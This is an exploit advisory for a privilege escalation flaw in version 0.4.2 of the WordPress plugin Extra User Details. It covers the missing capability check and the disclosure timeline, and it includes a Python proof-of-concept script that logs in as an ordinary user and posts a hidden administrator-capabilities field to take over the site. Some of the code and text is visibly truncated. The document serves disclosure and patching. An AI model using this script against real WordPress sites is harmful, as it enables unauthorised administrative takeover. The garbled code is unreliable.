* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
_Extra User Details_ plugin for WordPress suffers from a Privilege
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities and
updates all meta information passed to post data. The only condition is that
the post variable name has the `eud` prefix which is striped before
updating the values in DB.
An attacker can exploit this misbehavior to update the
meta information to gain administrative privileges.
In the following PoC we assume that the database has the `wp` prefix, a very common scenario as this is the default WordPress value
# !/usr/bin/python3
# Extra User Details Privilege Escalation Exploit
# Author: Panagiotis Vagenas <pan.vagenas>
# Dependencies: BeautifulSoup
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
data = {
'eudwp_capabilities[administrator]': 1,
for i in f.find_all('input'):
if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
data[i.attrs['name']] = i.attrs['value']
r = s.post(profileUrl, data)
if r.status_code == 200:
Upgrade to v0.4.2.1
1. **2016-02-13**: Vendor notified through wordpress.org support forums
2. **2016-02-13**: Vendor notified through through the contact form in his website
3. **2016-02-13**: Vendor responded and received details about this issue
4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue